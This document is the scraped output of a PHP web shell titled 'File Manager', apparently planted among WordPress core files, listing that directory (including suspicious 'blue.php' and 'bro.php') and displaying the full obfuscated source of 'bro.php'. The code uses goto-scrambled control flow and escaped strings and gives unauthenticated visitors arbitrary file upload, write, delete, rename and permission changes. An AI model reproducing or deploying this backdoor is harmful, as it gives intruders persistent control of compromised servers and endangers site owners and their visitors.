File Manager
Create Folder
Create
Create File
Create
Upload File
Upload
Files and Folders in "."
Folders:
📁
plugins
Rename
Change Permission
Delete
📁
themes
Rename
Change Permission
Delete
Files:
📄
admin-bar.php
Edit
Rename
Delete
Change Permission
📄
block-template-utils.php
Edit
Rename
Delete
Change Permission
📄
blocks.php
Edit
Rename
Delete
Change Permission
📄
blue.php
Edit
Rename
Delete
Change Permission
📄
bro.php
Edit
Rename
Delete
Change Permission
📄
class-wp-admin-bar.php
Edit
Rename
Delete
Change Permission
📄
class-wp-comment-query.php
Edit
Rename
Delete
Change Permission
📄
class-wp-editor.php
Edit
Rename
Delete
Change Permission
📄
class-wp-image-editor-imagick.php
Edit
Rename
Delete
Change Permission
📄
class-wp-network-query.php
Edit
Rename
Delete
Change Permission
📄
class-wp-site-query.php
Edit
Rename
Delete
Change Permission
📄
class-wp-theme-json-resolver.php
Edit
Rename
Delete
Change Permission
📄
class-wp-theme-json.php
Edit
Rename
Delete
Change Permission
📄
class-wp-walker.php
Edit
Rename
Delete
Change Permission
📄
comment-template.php
Edit
Rename
Delete
Change Permission
📄
compat.php
Edit
Rename
Delete
Change Permission
📄
formatting.php
Edit
Rename
Delete
Change Permission
📄
functions.php
Edit
Rename
Delete
Change Permission
📄
global-styles-and-settings.php
Edit
Rename
Delete
Change Permission
📄
index.php
Edit
Rename
Delete
Change Permission
📄
kses.php
Edit
Rename
Delete
Change Permission
📄
media-template.php
Edit
Rename
Delete
Change Permission
📄
media.php
Edit
Rename
Delete
Change Permission
📄
option.php
Edit
Rename
Delete
Change Permission
📄
post.php
Edit
Rename
Delete
Change Permission
📄
taxonomy.php
Edit
Rename
Delete
Change Permission
📄
theme-i18n.json
Edit
Rename
Delete
Change Permission
📄
version.php
Edit
Rename
Delete
Change Permission
Edit File "bro.php"
<?php goto wFfOW; I5qsB: ?> </div><h3>Files:</h3><div><?php goto y0tnR; z72XS: $files = scandir($dir); goto i3KRY; npw3Y: foreach ($folders as $folder) { ?> <div class="folder"><span class="icon">📁</span> <a href="?dir=<?php echo urlencode($dir . "\57" . $folder); ?> "><?php echo htmlspecialchars($folder); ?> </a><form action=""method="post"style="display:inline"><input name="file"value="<?php echo htmlspecialchars($dir . "\57" . $folder); ?> "type="hidden"> <button name="rename"type="submit">Rename</button> <button name="chmod"type="submit">Change Permission</button> <button name="delete"type="submit"class="delete-button"onclick='return confirm("Are you sure you want to delete this folder?")'>Delete</button></form></div><?php } goto I5qsB; i3KRY: $folders = array(); goto j1iI_; bg24W: if ($dir !== "\x2e") { ?> <a href="?dir=<?php echo urlencode($parentDir); ?> "style="display:inline-block;margin-bottom:10px;color:#00f">Back to Parent Directory</a><?php } goto lCCHC; hgbEY: if (isset($_POST["\x65\x64\151\164"])) { $file = $_POST["\146\151\154\145"]; file_put_contents($file, $_POST["\143\x6f\x6e\x74\145\x6e\164"]); } goto Zl7Bd; ugp5a: ?> </div><?php goto pJpqh; wFfOW: $dir = "\x2e"; goto U6cmn; j1iI_: $filesList = array(); goto T2AjV; Zl7Bd: if (isset($_POST["\143\x68\x6d\157\144"])) { $file = $_POST["\146\x69\154\145"]; $newPermissions = octdec($_POST["\x70\x65\162\x6d\x69\163\x73\x69\x6f\156\163"]); chmod($file, $newPermissions); } goto wwGZu; S1aOn: if (isset($_POST["\x63\162\145\x61\164\x65\137\x66\x69\x6c\x65"])) { $fileName = $_POST["\x66\151\154\x65\x5f\x6e\141\x6d\x65"]; file_put_contents($dir . "\x2f" . $fileName, ''); } goto c5372; gpqUT: ?> "</h2><?php goto bg24W; JhYZT: if (isset($_POST["\x72\145\x6e\141\155\x65"])) { $file = $_POST["\146\151\x6c\145"]; $newName = $_POST["\156\x65\x77\x5f\x6e\141\155\145"]; rename($file, dirname($file) . "\57" . $newName); } goto hgbEY; U6cmn: if (isset($_GET["\144\x69\x72"])) { $dir = $_GET["\x64\x69\x72"]; } goto T8eWJ; y0tnR: foreach ($filesList as $file) { ?> <div class="file"><span class="icon">📄</span><?php echo htmlspecialchars($file); ?> <form action=""method="post"style="display:inline"><input name="file"value="<?php echo htmlspecialchars($dir . "\57" . $file); ?> "type="hidden"> <a href="?edit=<?php echo urlencode($dir . "\x2f" . $file); ?> ">Edit</a> <button name="rename"type="submit">Rename</button> <button name="delete"type="submit"class="delete-button"onclick='return confirm("Are you sure you want to delete this?")'>Delete</button> <button name="chmod"type="submit">Change Permission</button></form></div><?php } goto ugp5a; c5372: if (isset($_POST["\x75\160\x6c\157\141\x64"])) { if (isset($_FILES["\x66\151\x6c\145"])) { move_uploaded_file($_FILES["\146\x69\x6c\x65"]["\164\155\160\137\156\x61\x6d\145"], $dir . "\x2f" . $_FILES["\x66\151\x6c\x65"]["\156\x61\x6d\x65"]); } } goto JhYZT; lCCHC: ?> <h3>Folders:</h3><div><?php goto npw3Y; pJpqh: if (isset($_GET["\145\x64\x69\x74"])) { $editFile = $_GET["\x65\144\x69\164"]; if (file_exists($editFile)) { $content = file_get_contents($editFile); ?> <h2>Edit File "<?php echo htmlspecialchars(basename($editFile)); ?> "</h2><form action=""method="post"><input name="file"value="<?php echo htmlspecialchars($editFile); ?> "type="hidden"> <textarea cols="30"name="content"rows="10"><?php echo htmlspecialchars($content); ?> </textarea> <button name="edit"type="submit">Save</button></form><?php } else { echo "\74\x70\76\106\x69\x6c\x65\40\x74\x69\144\141\153\x20\144\x69\164\145\155\165\x6b\x61\x6e\x2e\74\57\160\76"; } } goto tMJwO; T8eWJ: if (isset($_POST["\143\x72\x65\x61\164\x65\137\146\x6f\154\144\145\162"])) { $folderName = $_POST["\146\x6f\x6c\x64\x65\162\137\156\141\155\x65"]; mkdir($dir . "\57" . $folderName); } goto S1aOn; NnrUV: ?> <!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>File Manager</title><style>body{font-family:Arial,sans-serif}a{text-decoration:none}.file,.folder{margin:5px 0}.folder{font-weight:700}button{padding:5px 10px;margin-left:5px;cursor:pointer;border:none;border-radius:4px;background-color:#007bff;color:#fff;font-size:14px;transition:background-color .3s}button:hover{background-color:#0056b3}.delete-button{background-color:#dc3545}.delete-button:hover{background-color:#c82333}form{display:inline}.header,h2{margin-top:20px}.container{margin-bottom:20px}.icon{margin-right:5px}</style></head><body><h1>File Manager</h1><div class="container header"><h2>Create Folder</h2><form action=""method="post"><input name="folder_name"required> <button name="create_folder"type="submit">Create</button></form></div><div class="container header"><h2>Create File</h2><form action=""method="post"><input name="file_name"required> <button name="create_file"type="submit">Create</button></form></div><div class="container header"><h2>Upload File</h2><form action=""method="post"enctype="multipart/form-data"><input name="file"type="file"required> <button name="upload"type="submit">Upload</button></form></div><h2>Files and Folders in "<?php goto mF4G_; mF4G_: echo htmlspecialchars($dir); goto gpqUT; tXLM1: if (isset($_POST["\x63\150\155\x6f\x64"])) { $fileToChmod = $_POST["\x66\151\154\x65"]; $permissions = substr(sprintf("\x25\x6f", fileperms($fileToChmod)), -4); ?> <h2>Change Permission for "<?php echo htmlspecialchars(basename($fileToChmod)); ?> "</h2><form action=""method="post"><input name="file"value="<?php echo htmlspecialchars($fileToChmod); ?> "type="hidden"> <input name="permissions"value="<?php echo htmlspecialchars($permissions); ?> "required> <button name="chmod"type="submit">Change</button></form><?php } goto Y1DR7; wwGZu: if (isset($_POST["\144\x65\154\x65\164\x65"])) { $file = $_POST["\146\x69\x6c\145"]; if (is_dir($file)) { rmdir($file); } else { unlink($file); } } goto z72XS; tMJwO: if (isset($_POST["\x72\x65\x6e\x61\155\145"])) { $fileToRename = $_POST["\146\x69\x6c\x65"]; $currentName = basename($fileToRename); ?> <h2>Rename File/Folder "<?php echo htmlspecialchars($currentName); ?> "</h2><form action=""method="post"><input name="file"value="<?php echo htmlspecialchars($fileToRename); ?> "type="hidden"> <input name="new_name"value="<?php echo htmlspecialchars($currentName); ?> "required> <button name="rename"type="submit">Rename</button></form><?php } goto tXLM1; dcjU7: $parentDir = dirname($dir); goto NnrUV; T2AjV: foreach ($files as $file) { if ($file != "\56" && $file != "\56\56") { if (is_dir($file)) { $folders[] = $file; } else { $filesList[] = $file; } } } goto dcjU7; Y1DR7: ?> </body></html>
Save